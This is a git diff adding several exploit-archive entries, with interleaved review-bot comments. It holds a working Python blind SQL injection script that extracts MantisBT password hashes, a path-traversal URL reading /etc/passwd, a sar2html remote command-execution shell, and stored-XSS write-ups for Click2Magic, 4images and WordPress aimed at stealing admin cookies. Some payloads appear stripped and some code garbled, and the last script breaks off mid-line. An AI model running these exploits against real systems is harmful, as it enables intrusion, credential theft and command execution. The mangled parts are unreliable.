diff --git a/exploits/multiple/webapps/49347.txt b/exploits/multiple/webapps/49347.txt
new file mode 100644
index 000000000..1eec3ab0a
--- /dev/null
+++ b/exploits/multiple/webapps/49347.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
+# Exploit Author: Shivam Verma(cyb3r_n3rd)
+# Date: 2020-12-25
+# Google Dork: N/A
+# Vendor Homepage: https://www.click2magic.com/user/agent/index
+# Software Link: https://www.click2magic.com
+# Version: 1.1.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data
+
+Step 1. visit the link
+Step 2. Start a new Chat
+Step 3. When ask for name paste your Xss Payload
+Step 4. Wait for the Administrator to click on Your link
+Step 5. You will receive Admin Cookie Everytime he Process the Request
+
+---
+
+XSS Payload: ">
\ No newline at end of file
diff --git a/exploits/php/webapps/49338.txt b/exploits/php/webapps/49338.txt
new file mode 100644
index 000000000..29ca3311e
--- /dev/null
+++ b/exploits/php/webapps/49338.txt
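Review bot: Step 4 says the administrator must click the attacker's link, which describes a link-based trigger, while the title and Step 3 describe a stored payload in the chat-name field that fires whenever the stored chat is viewed; state the trigger once, e.g. `Step 4. The payload executes when an agent or administrator opens the stored chat in the agent console`. The header carries no CVE or vendor-fix reference, so a reader cannot tell whether 1.1.5 is the last affected release; if the vendor was contacted, a disclosure line belongs in the header. A remediation line is also missing: contextual output encoding of the visitor-supplied name in the agent view plus an HttpOnly session cookie would remove the cookie-capture impact the write-up claims.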
@@ -0,0 +1,68 @@
+# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS
+# Date: 31/12/2020
+# Exploit Author: gx1
+# Vulnerability Discovery: Simon Scannell
+# Vendor Homepage: https://wordpress.com/
+# Software Link: https://github.com/WordPress/WordPress
+# Version: <= 5.2.2
+# Tested on: any
+# CVE: CVE-2019-16223
+
+# References:
+https://nvd.nist.gov/vuln/detail/CVE-2019-16223
+https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
+
+Description:
+WordPress before 5.2.3 allows XSS in post previews by authenticated users.
+
+Technical Details and Exploitation:
+The vulnerability is due to two condition:
+1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability:
+
+the function sanitizes bad protocols, and applies a convertion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for html entities after two points, as it is possible to
+observe by the applied fix:
+
+============================================================================================================================================
+function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) {
++ $string = preg_replace( '/(�*58(?![;0-9])|�*3a(?![;a-f0-9]))/i', '$1;', $string ); # APPLIED FIX AFTER VULNERABILITY DETECTION
+ $string2 = preg_split( '/:|�*58;|�*3a;/i', $string, 2 );
+ if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) {
+
+============================================================================================================================================
+This allows an attacker to inject attack strings such as:
+
+============================================================================================================================================
+Example Attack
+============================================================================================================================================
+Anyway, Wordpress protects against this attack because it converts any type of html entities during the rendering of posts. In a particular case, during preview, it is possible to inject html entities in a URL. That is the second condition.
+
+2. During preview, get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity:
+
+============================================================================================================================================
+function get_the_content( $more_link_text = null, $strip_teaser = false ) {
+
+ ...
+ if ( $preview ) // Preview fix for JavaScript bug with foreign languages.
+ $output = preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output );
+
+ return $output;
+}
+
+function _convert_urlencoded_to_entities( $match ) {
+ return '&#' . base_convert( $match[1], 16, 10 ) . ';';
+}
+
+============================================================================================================================================
+For this reason, it is possible to send URL encoded strings that will be converted in HTML entities during preview. HTML entities can be crafted to bypass wp_ses_bad_protocol_once() function due to issue described in condition 1.
+
+Proof Of Concept:
+1. Create a new post
+2. Insert in code editor the following HTML PoC code:
+
+poc
+
+3. Click on preview and click the "poc" link
+
+Solution:
+
+Upgrade Wordpress to version >= 5.2.3
\ No newline at end of file
diff --git a/exploits/php/webapps/49339.txt b/exploits/php/webapps/49339.txt
new file mode 100644
index 000000000..3d003f1ad
--- /dev/null
+++ b/exploits/php/webapps/49339.txt
@@ -0,0 +1,21 @@
+# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
+# Date: 30-12-2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.4homepages.de/
+# Software Link: https://www.4homepages.de/download-4images
+# Version: 1.7.11
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time
+any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload.
+
+Steps-To-Reproduce:
+1. Login into 4images admin panel.
+2. Now go to the add images tab.
+3. Now paste the below payload in the URL field.
+ritesh">
+4. Now click on add button.
+5. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49340.py b/exploits/php/webapps/49340.py
new file mode 100755
index 000000000..6768948d7
--- /dev/null
+++ b/exploits/php/webapps/49340.py
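Review bot: The paragraph after the second code block names `wp_ses_bad_protocol_once()`, but the function discussed under condition 1 and shown in the first block is `wp_kses_bad_protocol_once()`; the typo should be fixed so both halves of the argument refer to the same function. In the quoted fix the entity prefix of both regexes appears as `�*58` / `�*3a`, which looks like an encoding-mangled copy of the upstream pattern rather than what the referenced 5.2.3 release ships; if the committed file really contains the replacement character, the quoted patch should be re-pasted from the release so readers can compare it with their own install. The "Example Attack" line and the "poc" line under step 2 carry no markup on this rendering; if that is also true of the committed file, the PoC cannot be followed as written and the write-up should say what the post body is expected to contain. The "Solution" section would also be more self-contained with one sentence tying it to the quoted fix, e.g. `5.2.3 terminates an entity-encoded protocol with ';' before the split on ':', so the bypass no longer survives sanitization`.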
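Review bot: The title and the "Vulnerable Parameters" line name the 'Profile Image' field, but steps 2–3 inject through the URL field of the admin panel's "add images" tab, so the write-up should name the parameter the steps actually exercise. Step 1 requires an admin-panel login, a precondition the header never states; add a line such as `# Privileges required: authenticated administrator` so the severity (post-authentication stored XSS) is clear to the reader. A remediation sentence is also missing: validating the image URL against an allow-list of schemes and encoding it on output are the fixes that the described steps point at.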
@@ -0,0 +1,91 @@ +# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection +# Date: 30/12/2020 +# Exploit Author: EthicalHCOP +# Vendor Homepage: https://www.mantisbt.org/ +# Version: 2.24.3 +# CVE: CVE-2020-28413 + +import requests, sys, time +from lxml import etree + +proxies = { + "http": "http://127.0.0.1:8080", + "https": "http://127.0.0.1:8080", + } + +def Hacer_Peticion(query): + home = "" + url = home+"/api/soap/mantisconnect.php" + headers = {'content-type': 'text/xml', + 'SOAPAction': url+'"/mc_project_get_users"'} + mantis_db_user = "" + mantis_db_pass = "" + body = """ + + + + """+mantis_db_user+""" + """+mantis_db_pass+""" + 0 + """+query+""" + + + """ + response = requests.post(url, data=body, headers=headers, verify=False) + #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False) + parser = etree.XMLParser(remove_blank_text=True) + xml = etree.XML(response.content, parser) + xml = etree.tostring(xml) + return(str(xml)) + +def Cantidad_Usuarios_Mantis(): + query = "0 union all select concat('-',(select count(*) " \ + "from mantis_user_table),'0'),2,3,4 order by id asc limit 1" + xml = Hacer_Peticion(query) + txt = xml.split("integer") + txt = txt[1].split("id") + registros = str(str(str(txt[0])[:-2])[-2:])[:-1] + return(registros) + +def Obtener_Id(usr_pos): + query = "0 union all select concat((SELECT id FROM mantis_user_table " \ + "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1" + xml = Hacer_Peticion(query) + txt = xml.split("integer") + txt = txt[1].split("id") + id = str(str(txt[0])[:-2])[-1:] + name = str(str(txt[1])[29:]).split("")[0] + return (id+"-"+name) + +def brute_force(data): + charts = "abcdefghijklmnopqrstuvwxyz0123456789" + passw = "" + id = data.split("-")[0] + name = data.split("-")[1] + for cp in range (1,33,1): + for c in charts: + print(f"\rHash: {passw}", end="") + time.sleep(0.00001) + sys.stdout.flush() + query = "0 union all select (select if(substring((select 
binary(password) " \ + "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1" + xml = Hacer_Peticion(query) + txt = xml.split("integer") + txt = txt[1].split("id") + r_id = str(str(txt[0])[:-2])[-1:] + if(r_id=="0"): + passw = passw + str(c) + break + print(f"\r", end="") + sys.stdout.flush() + print(name+": "+passw) + +def main(): + cantidad_users = Cantidad_Usuarios_Mantis() + print("Cantidad usuarios en db: "+str(cantidad_users)) + print("Obteniendo Hashes...") + for x in range(0,int(cantidad_users),1): + brute_force(Obtener_Id(x)) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/49343.txt b/exploits/php/webapps/49343.txt new file mode 100644 index 000000000..e41f6e0ef --- /dev/null +++ b/exploits/php/webapps/49343.txt @@ -0,0 +1,8 @@ +# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal +# Date: Fri, 11 Dec 2020 +# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs" +# Vendor Homepage: Advanced Comment System - ACS +# Version: v1.0 +# CVE: CVE-2020-35598 + +http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 \ No newline at end of file diff --git a/exploits/php/webapps/49344.py b/exploits/php/webapps/49344.py new file mode 100755 index 000000000..51aa3c5f5 --- /dev/null +++ b/exploits/php/webapps/49344.py 
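Review bot: The file is committed with mode 100755 but its first line is `# Exploit Title:`, so there is no interpreter line and `./49340.py` is handed to the shell rather than to Python; add `#!/usr/bin/env python3` as line 1 (the 49344.py hunk further down has the same problem, with its shebang placed after the header comments). `proxies` is defined at module level but only referenced in the commented-out call inside `Hacer_Peticion`, and `id` shadows the builtin in both `Obtener_Id` and `brute_force`. Every request passes `verify=False`, which silently disables TLS certificate validation for the whole run; a one-line comment at the call site stating that this is deliberate would stop a later reader from treating it as an oversight. Indentation is lost in this rendering, so the block structure of `brute_force` could not be checked here.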
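Review bot: The `# Vendor Homepage:` field holds the product name "Advanced Comment System - ACS" rather than a URL, and there is no `# Software Link:` or `# Tested on:` line, so neither the affected package nor the test environment can be located from the header. The environment matters here because the request ends in `%00` and therefore depends on null-byte truncation of the file path, which PHP has rejected in its filesystem functions since 5.3.4; stating the PHP version used tells a defender whether this traversal reaches the target file on a current deployment. Suggested header lines: `# Software Link: <package download URL>` and `# Tested on: <OS / PHP version>`.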
@@ -0,0 +1,39 @@ +# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution +# Date: 27-12-2020 +# Exploit Author: Musyoka Ian +# Vendor Homepage:https://github.com/cemtan/sar2html +# Software Link: https://sourceforge.net/projects/sar2html/ +# Version: 3.2.1 +# Tested on: Ubuntu 18.04.1 + +#!/usr/bin/env python3 + +import requests +import re +from cmd import Cmd + +url = input("Enter The url => ") + +class Terminal(Cmd): + prompt = "Command => " + def default(self, args): + exploiter(args) + +def exploiter(cmd): + global url + sess = requests.session() + output = sess.get(f"{url}/index.php?plot=;{cmd}") + try: + out = re.findall("